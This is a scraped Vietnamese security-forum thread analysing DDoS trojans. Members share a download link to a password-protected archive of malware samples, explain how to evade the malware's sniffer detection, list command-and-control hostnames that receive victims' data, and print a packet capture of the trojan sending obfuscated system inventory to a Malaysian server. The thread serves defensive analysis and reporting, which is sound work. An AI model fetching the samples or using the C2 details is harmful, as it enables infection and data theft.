Trong file QTTask.zip mà tui đã up ở mediafire: http://www.mediafire.com/?259kv56xit09c6b (password: infected) có các file IDA 6.1 database file .idb, các bạn có thể mở ra với IDA 6.1 và xem các .idb đó như một tham khảo thêm ! PS: Chiều nay ngồi RCE một con virus của Nga mà một thằng bên Kaspersky lab gởi cho mình. RCE một đổi, mình nổi khùng, mẹ, sao có thằng giỏi thế không biết, nó quay mình chóng mặt luôn, dẹp luôn, bỏ đi nhậu "rữa xe" cho khoẻ ! Chả liên quan gì tới mình ! Tiện thể, nhờ bà con up giùm các file trong QTTask.zip trên lên các AVs. Cùng nhau up phụ một tay nhé ! Có một điều nữa, từ trước tới giờ, đa số bà con chỉ biết Wireshark và Ethernet là các tool phổ biến để sniffer và packet capture, monitor... Chỉ gần đây anh em ta mới đề cập tới SmartSniff (smsniff.exe) của Nirosoft. Anh em stl cũng theo topic này rất sát, thấy, à mày dùng smsniff hả, tao chơi code detect smsniff cho mày biết ! Em chỉ cần, vẫn dùng smsniff.exe, đổi tên nó thành nwsniff.exe chẵng hạn, rồi dùng 1 HexEditor, search và replace SmartSniff string thành NetworkSniff string chẳng hạn, thì đoạn code detect SmartSniff của mấy anh stl vứt vào sọt rác luôn (FindWindowW tìm ra không mấy anh stl ?). Khi nào mấy anh stl cần học cờ rắc, liên hệ em hay anh em REA, HVA nhé ! Học phí cực rẽ luôn !]]>
/hvaonline/posts/list/39641.html#247764 /hvaonline/posts/list/39641.html#247764 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247765 /hvaonline/posts/list/39641.html#247765 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247766 /hvaonline/posts/list/39641.html#247766 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247767 /hvaonline/posts/list/39641.html#247767 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Anh em stl cũng theo topic này rất sát, thấy, à mày dùng smsniff hả, tao chơi code detect smsniff cho mày biết !   hic hic, mình chiều về là khoảng 30 p là vào coi topic này, nghe anh nói chắc không dám vào :)), không khéo lại bị nghi là stl :))]]> /hvaonline/posts/list/39641.html#247768 /hvaonline/posts/list/39641.html#247768 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247769 /hvaonline/posts/list/39641.html#247769 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247770 /hvaonline/posts/list/39641.html#247770 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

stf wrote:

soida wrote:
Vậy, mình chạy malware trong 1 máy ảo, ngoài máy thật bật chương trình Wireshake thì nó có phát hiện được không nhỉ 

TQN wrote:
Dĩ nhiên là không, vì ToolHelp32 API chỉ detect trên 1 session (có nhiều session trong 1 máy), và máy thật khác máy ảo. 
Hai bác định vẽ đường cho hươu chạy sao ;) vì hình như cũng có cái gọi là VMware detection...lúc đó bọn STL lại thêm 1 đoạn code check nếu là VM thì "chém vè" tiếp...keke 
Hì hì, tớ nghĩ (và chắc TQN cũng nghĩ) là chả có gì là vẽ đường cho hươu chạy hết bởi vì nói cho cùng, tất cả đều là kiến thức và ứng dụng, chỉ có khác ở chỗ ứng dụng kiến thức để giúp cho xã hội, cho trí tuệ, cho con người được tốt đẹp hơn hay là làm cho nó tan nát hơn thì tuỳ. HVA chơi rất đường đường chính chính, phân tích rất kỹ thuật, có bằng chứng, có minh hoạ rất rõ ràng. Cái này không phải chỉ riêng cho mấy anh stl mà còn cho công luận đọc và hiểu một cách rộng rãi. Nếu "hươu" chỉ có thể "chạy" một đường, một kiểu, một lối mòn tư duy thì chẳng bao lâu, "hươu" sẽ đâm vô ngõ cụt. Nếu "hươu" mà thoảt ra khỏi lối mòn tư duy, mở rộng tầm nhìn nhưng vẫn cắn răng làm những chuyện bậy bạ thì để cho toà án lương tâm xử... "hươu". Cho đến nay, "hươu" đã đi đến chỗ bế tắc gần như hoàn toàn. Vẫn loay hoay trong cái hộp mà không thoát ra được nhưng tệ nhất là càng ngày càng đắm chìm vào những trò che đậy tồi tệ không những trong kỹ thuật mà còn trong đời sống nữa. Tớ không hiểu nổi, mấy anh stl đang phục vụ cái gì?]]>
/hvaonline/posts/list/39641.html#247789 /hvaonline/posts/list/39641.html#247789 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. 1. alligator.buyshouses.net 2. examiner.thruhere.net 3. gssiweb.is-a-chef.net 4. tmz.is-found.org 5. wbir.iamallama.com 6. weei.istmein.de Trong mấy cái host này, có cái của Malaisia, có cái của Đức, tùm lum hết. Kinh thiệt, mấy anh stl giàu quá. -:|- Các host này mở sẵn port 443 để trojan upload thông tin của victim về. Em nhờ bà con report baduse để mấy cái host này die sớm. Được vậy thì mọi người dùng Internet, dân IT VN ta đỡ khổ, đỡ bị "bạch hoá" hay bắt buộc đi "tắm trắng" =)) Bà con IT admin ở các cơ quan, công ty, trường học... chịu khó set firewall, IPS hay IDS gì đó để detect các connection in, out tới các host trên. Nếu có, chia buồn, dính "mèo què" của stl rồi ! Đám mèo què này hơi khó xoá khi boot vào Windows bình thường, bà con chịu khó dùng Hiren Boot disk để boot và xoá từng file trong danh sách các file trong QTTask.zip mà em đã up trên mediafire nhé ! PS: Bà con thắc mắc, anh em HVA có chỉ đường cho "hươu" chạy không, về các anh em khác thì em không dám nói, riêng bản thân em, thì em xin nói thật, là không ! Vì con hươu này còn nhỏ lắm, nên chỉ chạy lòng vòng thôi. Từ đầu tới giờ, có nhiều cái em không dám viết ra, vì nếu viết ra mà mấy anh stl áp dụng thì em cũng chạy "lòng vòng" rồi "cắm đầu" luôn, nên chỉ dám nghĩ trong đầu thôi, không dám nói và tới giờ, may cho em quá, mấy anh stl coder chưa đi mấy con đường đấy, "phào", khoẻ :-) Còn chuyện RCE và phân tích code của mấy anh stl thì em nghĩ đơn giản là giống như anh em HVA ta đang viết các bài báo phân tích kỹ thuật để mọi người, mọi coder, reverser... đọc giải trí, không bổ bề này cũng bổ bề kia thôi. Những kỹ thuật mà mấy anh stl đang dùng chả có gì là tinh vi như báo, đài nói cả, chỉ là code VC++ bình thường thôi, giả "hươu, nai" thôi ! Chỉ cần chút "xíu xíu" kinh nghiện RCE VC++ application là ra tất. Sau này em sẽ post topic hướng dẫn RCE VC++ app, bà con đón đọc nhé. Các kỹ thuật trong đó em cũng học hỏi từ các guru, sư phụ RCE của em như Kaspersky, Kayaker, Ilfak, Igor... thôi ! Ngày hôm qua em gặp mẫu của thằng Nga, dùng RPC để lây lan, em thiệt bó tay, té xỉu luôn ! Chả hiểu nó viết cái gì, vì về code nó đã là thằng coder cao tay hơn mình rồi ! Sau cùng, phải nhờ anh Gấu gồ, anh ấy chỉ ra là nó khai thác lổi của Print Spooler.]]> /hvaonline/posts/list/39641.html#247814 /hvaonline/posts/list/39641.html#247814 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247817 /hvaonline/posts/list/39641.html#247817 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
==================================================
Protocol          : TCP
Remote Address    : 111.90.149.58
Remote Port       : 443
Service Name      : https
Packets           : 31  {17 ; 14}
Data Size         : 15,115 Bytes  {7,501 ; 7,614}
Total Size        : 16,399 Bytes  {8,181 ; 8,218}
Data Speed        : 0.1 KB/Sec
Duration          : 00:02:03.812
ProcessID         : 4076
Remote MAC Address: 00-22-6b-f4-bc-a9
Remote IP Country : Malaysia
==================================================

[27/09/2011 3:13:17 PM:687]
00000000  67 00 00 00 00                                                                                       g....

[27/09/2011 3:13:17 PM:765]
00000000  81 8D 68 B2 31 23 90 1F  21 9E 55 59 B5 30 A5 C4  07 97 53 2F 37 72 72 44  55 AC 1C 0F 0E 47 8E 94   h²1#. !žUYµ0¥Ä .—S/7rrD U¬...GŽ”
00000020  96 21 24 A8 BA B3 0B E8  23 94 18 4B 73 18 2E 14  5C 8F C2 02 D7 7B E6 0E  1A 23 5D 85 06 80 11 DA   –!$¨º³.è #”.Ks... \Â.×{æ. .#]….€.Ú
00000040  0F C0 C2 93 0B FD 09 53  8B 6B 0C A2 5A 27 D1 3D  7D 07 B2 7E 84 8C BD 1A  3A 16 8D 97 56 86 E2 A2   .À“.ý.S ‹k.¢Z'Ñ= }.²~„Œ½. :.—V†â¢
00000060  83 3D 3B B2                                                                                          ƒ=;²

[27/09/2011 3:13:17 PM:765]
00000000  81 8E 6A B5 35 28 96 26  29 A7 5F 64 C1 3D B3 D3  17 A8 65 42 4B 87 88 5B  6D C5 36 2A 2A 64 AC B3   Žjµ5(–& )§_dÁ=³Ó .¨eBK‡ˆ[ mÅ6**d¬³
00000020  B6 42 46 CB DE D8 31 0F  4B BD 42 76 9F 45 5C 43  8C C0 F4 35 0B B0 1C 45  52 5C 97 C0 42 BD 4F 19   ¶BFËÞØ1. K½BvŸE\C ŒÀô5.°.E R\—ÀB½O.
00000040  4F 01 04 D6 4F 42 4F 9A  D3 B4 56 ED A6 74 1F 8C  CD 58 04 D1 D8 E1 13 71  92 6F E7 F2 B2 E3 40 01   O..ÖOBOš Ó´Ví¦t.Œ ÍX.ÑØá.q ’oçò²ã@.
00000060  E3 9E 9D 15                                                                                          㞝.

[27/09/2011 3:13:17 PM:859]
00000000  00                                                                                                   .

[27/09/2011 3:13:18 PM:046]
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.EEE-YEE-YEEEEEEEEEEEEEE/.---/[X%-\\+(Y%\,_,X\Y,^(\%X)-[/-,__0_^--0---,-%^X)\X-)**Y^\^[----,+%[.-.(-.,.EMNM..mk.^'AIxpmAO^XAKtohnALII|nvAMX[tqxnA~kxontrsn3ts.(*%)$-+(.F(3,3/+--@=0=NM=.=0=MI=,=0=NP=/(+=0=UY=_-)\*X$Y=0=ST^=--'-\'(X'/,'__'$+=0=_|t=PY--%--0_WYJ3PJ-JP\P$..$//.*=====.-y=,u=.p=a=----0--0--=--'--'--.RdmLLYO-$~PvUM+RLMS_Iz  BmXhTMnwQjNv*gSh)vZX+Hz  3FB@FB@FB@39\yrx=[q|nu=Mq|dxo=,-=\~itkxE..\yrx=[q|nu=Mq|dxo=,-=Mqhzts.._r~un=/3)3+=5oxprkx=rsqd4.._rrni=Qto|otxn={ro=^66_htqyxo=/-,-..^rmxost~=Yxnvirm=Nx|o~u=0=Urpx..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Y|i||nx=M|~v..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Uxqm=Ndnixp..Xp|o~|yxor=O\Y=Nihytr=/-,-..UM=Q|nxoWxi=P,.,$=P[M=Nxotxn..V|nmxonvd=\sit0Ktohn=/-,,..Tsixosxi=Xemqroxo..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/)*+)$-4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(-.++(4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(-*$.%4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=Tsixosxi=Xemqroxo=%=5V_/(.-()%4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(.((,/4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(.+/*+4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(.+/*+0k/4..Hmy|ix={ro=Jtsyrjn=EM=5V_/(),*+.4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=Tsixosxi=Xemqroxo=%=5V_/())(/,4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/())%$.4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/((($,*4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=Tsixosxi=Xemqroxo=%=5V_/(($-)$4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(+/$.*4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(++)()4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(+*+%-4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(*-///4..Uri{te={ro=Jtsyrjn=EM=5V_/(*-*$,4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(*-$)*4..Hmy|ix={ro=Jtsyrjn=EM=5V_/+-**,/4..Hmy|ix={ro=Jtsyrjn=EM=5V_/+,++*+4..Pt~ornr{i=Jtsyrjn=Yotkxo=Vti=*3,3-3*+--..V0Qtix=Pxz|=^ryx~=M|~v=)3%3(..Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,..Pt~ornr{i=Ktnh|q=W>=/3-=Oxytniothi|qx=M|~v|zx..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=Irrqn=0=XSH..Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH..Prgtqq|=[tox{re=+3-3/=5e%+=xs0HN4..PNYS=Qto|od={ro=Ktnh|q=Nihytr=/--%=0=XSH..Pt~ornr{i=Ixei0ir0Nmxx~u=Xsztsx=)3-=5Xszqtnu4..Mdiurs=/3*=mdjts./0/,+..O|kx=Oxmroin=*3*3-=_X..HstVxd=)3-=SI..Pt~ornr{i=Vxosxq0Pryx=Yotkxo=[o|pxjrov=[x|ihox=M|~v=,3(..JtsM~|m=)3,3/..JtsO\O=|o~utkxo..D|urr<=Pxnnxszxo..Pt~ornr{i=Ktnh|q=^66=/--%=\IQ=Hmy|ix=v$*.$/)=0=e%+=$3-3.-*/$3),)%..UIVV..nxsnron|pmqxn..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=3SXI=[o|pxjrov=Irrqn=0=xsh..ktni|qtnBe+){ox..jy{irrqnBt|+){ox..Q|~=Ktxi=piy$=XK\..sxijrovqto|otxnBt|+){ox..ir|nixopxi|y|i|m|~v|zxn|pmqx..ts{n|pmqxBe+){ox..sxijrovqto|otxnBe%+{ox..yn{n|pmqxn..nxihmn|pmqxn..P|ovxiOxnx|o~u..nxihmirrqnBe+){ox..Pt~ornr{i=Ktnh|q=^66=/-,-==e%+=Oxytniothi|qx=0=,-3-3.-.,$..tp|ztszirrqnBe%+{ox..msmirrqnBe+){ox..mrjxop|s|zxpxsiBt|+){ox..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3.-*/$3),)%..ux|yxon..[|eNxihmTsni|qqxo..W|k|5IP4=+=Hmy|ix=/+..qhxirriun|pmqxn..|hytrn|pmqxn..zxsxo|qirrqnBt|+){ox..ktni|qtnBt|+){ox..Mdiurs=/3*3,..htqyirrqnBe%+{ox..r{{oxzBt|+){ox..io|~tszirrqBe+){ox..irrqnBt|+){ox..motsiirrqnBt|+){ox..motsiirrqnBe+){ox..PNYS=Qto|od={ro=Ktnh|q=Nihytr=/--%=0=XSH..irrqtsyxe..io|~tszirrqBt|+){ox..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=^rqqx~itrs=Irrqn=Nrho~x=^|~ux..yxhz{tqxnBjts*..io|~tszirrqBe%+{ox..ummhnzP,.,-..zxsxo|qn|pmqxn..ir|nixon|pmqx..{tox{qdn|pmqx..xkxsin|pmqx..trpxiot~n|pmqxn..W|k|=\hir=Hmy|ixo..qtnBe+){ox..tp|ztszirrqnBt|+){ox..m{yBe+){ox..jsxiqtnBe+){ox..~|s~xqn|pmqx..qhxirriuirrqnBe+){ox..~uvts{irrqBe%+{ox..jy{irrqnBe%+{ox..ntyxnurjn|pmqxn..ox|ypx..sxijrovn|pmqxn..PNEPQ=+=Nxokt~x=M|~v=/=5V_$*.+%+4..mroitrn|pmqx..trpxiot~irrqnBe%+{ox..Ro|~qx=KP=Ktoih|q_re=)3-3,/..niro|zxn|pmqxn..hnn|pmqxn..np|oi~|oyn|pmqxn..|kniox|pirrqnBe%+{ox..jsxiqtnBt|+){ox.._rrni=Qto|otxn={ro=^66_htqyxo=/--$..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=NYV=Ox{xoxs~x=\nnxpqtxn=|sy=TsixqqtNxsnx..ton|pmqxn..V|nmxonvd=Tsixosxi=Nx~hotid=/-,,..msmirrqnBe%+{ox..Pt~ornr{i=Yr~hpxsi=Xemqroxo=/--%..Pt~ornr{i=Ktnh|q=W>=/3-=Oxytniothi|qx=M|~v|zx..niox|ppxyt|n|pmqxn..r{{oxzBe%+{ox..Pt~ornr{i=Ktnh|q=^66=/--(=Oxytniothi|qx..hnn|pmqxn..yokirrqnBt|+){ox..Ox~xtkxTsni|qqxo..UM=Q|nxoWxi=Irrqre..Pt~ornr{i=Ktnh|q=^66=/--(=\IQ=Hmy|ix=v$*.$/.=0=e%+=%3-3(-*/*3)-(...Ktnh|q=^66=/--%=e%+=Ohsitpx=0=5k$3-3.-*/$3),)%4..Ktnh|q=^66=/--%=e%+=Ohsitpx=0=k$3-3.-*/$3),)%..ts{n|pmqxBe%+{ox..Nr{ij|ox=Hmy|ix={ro=Jx=[rqyxon..Pt~ornr{i=Jtsyrjn=Yotkxo=Vti=Yr~hpxsi|itrs=*+--3-$,/-,..y{eBt|+){ox..Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH..Nx~hotid=Hmy|ix={ro=Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH=5V_//(,)%*4..Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH=Nxokt~x=M|~v=,=5V_$)(,)-4..Uri{te={ro=Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH=5V_$*,-$/4..xksiyokn|pmqx..m{yBe%+{ox..Yxhzztsz=Irrqn={ro=Jtsyrjn=5e%+4..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=Ux|yxon=|sy=Qto|otxn..jmyirrqnBe%+{ox..PNEPQ=)3-=NM/=5V_$()).-4..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=V_/)+*,*)=0=e%+=$3-3.-*/$3((*-..y{eBe%+{ox..Pt~ornr{i=Ntqkxoqtzui..Tsixq5O4=Xeioxpx=Zo|mut~n=/=Yotkxo..nxihmirrqnBe%+{ox..irrqnBe+){ox..yokirrqnBe%+{ox..Pt~ornr{i=R{{t~x=Mor{xnntrs|q=Xytitrs=/--...^rpm|ittqtid=M|~v={ro=iux=/--*=R{{t~x=ndnixp..utyBtsmhin|pmqxn..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=Irrqn=0=XSH..tr~iqn|pmqx.._rrni=Qto|otxn={ro=^66_htqyxo=/-,-..Pt~ornr{i=\mmqt~|itrs=Xooro=Oxmroitsz..UM=Q|nxoWxi=P,.,$=P[M=Nxotxn=Irrqre..utyn|pmqxtsmhi..y{eBe+){ox..mrjxop|s|zxpxsiBe%+{ox..htqyn|pmqxn..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3.-*/$3,*..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3.-*/$3+,+,..jemqtnBe%+{ox..zxsxo|qirrqnBe+){ox..\QMN=Irh~u=M|y=Yotkxo..hpy{n|pmqxn..Pt~ornr{i=3SXI=[o|pxjrov=.3-=Nxokt~x=M|~v=/..ytnmq|dn|pmqxn..ts{n|pmqxBt|+){ox..PokqHnzIo|~vtsz..qhxirriuirrqnBe%+{ox..tp|ztszirrqnBe+){ox..Xp|o~|yxor=O\Y=Nihytr=/-,-..jnyirrqBe%+{ox..yokirrqnBe+){ox..jmyn|pmqxn..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=NM,=Jts./=Irrqn..nxihmirrqnBt|+){ox..mrjxop|s|zxpxsiBe+){ox..motsiirrqnBe%+{ox..qtnBe%+{ox..jptn|pmqxn..|kniox|pirrqnBt|+){ox..|kniox|pirrqnBe+){ox..msmmroinn|pmqx..YN[0VtiNxihm..t{nn|pmqxn..Pt~ornr{i=3SXI=[o|pxjrov=/3-=Nxokt~x=M|~v=/..njihsxo..utyn|pmqxn..N~|s=Ir..[|eNxsyTsni|qqxo..OX\QIXV=ZX=;=[X=Xiuxosxi=M^T0X=ST^=Yotkxo..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=NM,=Irrqn..r|~oBe%+{ox..irrqnBe%+{ox..Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,..Uri{te={ro=Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,=5V_$(.($(4..Uri{te={ro=Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,=5V_$(%)%)4..Hmy|ix={ro=Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,=5V_$+.*-*4..zxsxo|qirrqnBe%+{ox..htqyirrqnBt|+){ox..P|ovxiOxnx|o~u..qtnBt|+){ox..nyk..jsxiqtnBe%+{ox..m{yBt|+){ox..trpxiot~irrqnBe+){ox..msmirrqnBt|+){ox..motsin|pmqxn..|kniox|pn|pmqxn..htqyirrqnBe+){ox..tsni|qquxqm..pryxpirrqn..qhxirriuirrqnBt|+){ox..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Y|i||nx=M|~v..r{{oxzBe+){ox..jmyirrqnBe+){ox..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=^rqqx~itrs=Irrqn=0=XSH..j~rtsni|qqxon..jnyirrqBt|+){ox..jnyirrqBe+){ox..Ox|qixv=Utzu=Yx{tstitrs=\hytr=Yotkxo..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Uxqm=Ndnixp..sxijrovqto|otxnBe+){ox..jy{irrqnBe+){ox..PNEPQ=)3-=NM/=5V_$*.+%%4..^ryxZx|o=Yxqmut=|sy=^66_htqyxo=/--$=Uxqm=Ndnixp..ktni|qtnBe%+{ox..jmyirrqnBt|+){ox..^ryxZx|o=Yxqmut=|sy=^66_htqyxo=/--$=Y|i||nx=M|~v..m~tyokn|pmqx..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3/,-//..
[27/09/2011 3:13:18 PM:281]
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.EEE,YEE,YEEEEEEEEEEEEEE/.---/[X%-\\+(Y%\,_,X\Y,^(\%X)-[/-,__0_^--0---,-%^X)\X-)**Y^\^[----,+%[.-.(-.,.EMNM..mk.^'AIxpmAO^XAKtohnALII|nvAMX[tqxnA~kxontrsn3ts.(*%)$-+(.F(3,3/+--@=0=NM=.=0=MI=,=0=NP=/(+=0=UY=_-)\*X$Y=0=ST^=--'-\'(X'/,'__'$+=0=_|t=PY--%--0_WYJ3PJ-JP\P$..$//.*=====.-y=,u=.p=a=----0--0--=--'--'--.RdmLLYO-$~PvUM+RLMS_Iz  BmXhTMnwQjNv*gSh)vZX+Hz  3FB@FB@FB@39\yrx=[q|nu=Mq|dxo=,-=\~itkxE..\yrx=[q|nu=Mq|dxo=,-=Mqhzts.._r~un=/3)3+=5oxprkx=rsqd4.._rrni=Qto|otxn={ro=^66_htqyxo=/-,-..^rmxost~=Yxnvirm=Nx|o~u=0=Urpx..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Y|i||nx=M|~v..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Uxqm=Ndnixp..Xp|o~|yxor=O\Y=Nihytr=/-,-..UM=Q|nxoWxi=P,.,$=P[M=Nxotxn..V|nmxonvd=\sit0Ktohn=/-,,..Tsixosxi=Xemqroxo..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/)*+)$-4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(-.++(4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(-*$.%4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=Tsixosxi=Xemqroxo=%=5V_/(.-()%4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(.((,/4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(.+/*+4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(.+/*+0k/4..Hmy|ix={ro=Jtsyrjn=EM=5V_/(),*+.4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=Tsixosxi=Xemqroxo=%=5V_/())(/,4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/())%$.4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/((($,*4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=Tsixosxi=Xemqroxo=%=5V_/(($-)$4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(+/$.*4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(++)()4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(+*+%-4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(*-///4..Uri{te={ro=Jtsyrjn=EM=5V_/(*-*$,4..Nx~hotid=Hmy|ix={ro=Jtsyrjn=EM=5V_/(*-$)*4..Hmy|ix={ro=Jtsyrjn=EM=5V_/+-**,/4..Hmy|ix={ro=Jtsyrjn=EM=5V_/+,++*+4..Pt~ornr{i=Jtsyrjn=Yotkxo=Vti=*3,3-3*+--..V0Qtix=Pxz|=^ryx~=M|~v=)3%3(..Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,..Pt~ornr{i=Ktnh|q=W>=/3-=Oxytniothi|qx=M|~v|zx..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=Irrqn=0=XSH..Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH..Prgtqq|=[tox{re=+3-3/=5e%+=xs0HN4..PNYS=Qto|od={ro=Ktnh|q=Nihytr=/--%=0=XSH..Pt~ornr{i=Ixei0ir0Nmxx~u=Xsztsx=)3-=5Xszqtnu4..Mdiurs=/3*=mdjts./0/,+..O|kx=Oxmroin=*3*3-=_X..HstVxd=)3-=SI..Pt~ornr{i=Vxosxq0Pryx=Yotkxo=[o|pxjrov=[x|ihox=M|~v=,3(..JtsM~|m=)3,3/..JtsO\O=|o~utkxo..D|urr<=Pxnnxszxo..Pt~ornr{i=Ktnh|q=^66=/--%=\IQ=Hmy|ix=v$*.$/)=0=e%+=$3-3.-*/$3),)%..UIVV..nxsnron|pmqxn..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=3SXI=[o|pxjrov=Irrqn=0=xsh..ktni|qtnBe+){ox..jy{irrqnBt|+){ox..Q|~=Ktxi=piy$=XK\..sxijrovqto|otxnBt|+){ox..ir|nixopxi|y|i|m|~v|zxn|pmqx..ts{n|pmqxBe+){ox..sxijrovqto|otxnBe%+{ox..yn{n|pmqxn..nxihmn|pmqxn..P|ovxiOxnx|o~u..nxihmirrqnBe+){ox..Pt~ornr{i=Ktnh|q=^66=/-,-==e%+=Oxytniothi|qx=0=,-3-3.-.,$..tp|ztszirrqnBe%+{ox..msmirrqnBe+){ox..mrjxop|s|zxpxsiBt|+){ox..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3.-*/$3),)%..ux|yxon..[|eNxihmTsni|qqxo..W|k|5IP4=+=Hmy|ix=/+..qhxirriun|pmqxn..|hytrn|pmqxn..zxsxo|qirrqnBt|+){ox..ktni|qtnBt|+){ox..Mdiurs=/3*3,..htqyirrqnBe%+{ox..r{{oxzBt|+){ox..io|~tszirrqBe+){ox..irrqnBt|+){ox..motsiirrqnBt|+){ox..motsiirrqnBe+){ox..PNYS=Qto|od={ro=Ktnh|q=Nihytr=/--%=0=XSH..irrqtsyxe..io|~tszirrqBt|+){ox..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=^rqqx~itrs=Irrqn=Nrho~x=^|~ux..yxhz{tqxnBjts*..io|~tszirrqBe%+{ox..ummhnzP,.,-..zxsxo|qn|pmqxn..ir|nixon|pmqx..{tox{qdn|pmqx..xkxsin|pmqx..trpxiot~n|pmqxn..W|k|=\hir=Hmy|ixo..qtnBe+){ox..tp|ztszirrqnBt|+){ox..m{yBe+){ox..jsxiqtnBe+){ox..~|s~xqn|pmqx..qhxirriuirrqnBe+){ox..~uvts{irrqBe%+{ox..jy{irrqnBe%+{ox..ntyxnurjn|pmqxn..ox|ypx..sxijrovn|pmqxn..PNEPQ=+=Nxokt~x=M|~v=/=5V_$*.+%+4..mroitrn|pmqx..trpxiot~irrqnBe%+{ox..Ro|~qx=KP=Ktoih|q_re=)3-3,/..niro|zxn|pmqxn..hnn|pmqxn..np|oi~|oyn|pmqxn..|kniox|pirrqnBe%+{ox..jsxiqtnBt|+){ox.._rrni=Qto|otxn={ro=^66_htqyxo=/--$..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=NYV=Ox{xoxs~x=\nnxpqtxn=|sy=TsixqqtNxsnx..ton|pmqxn..V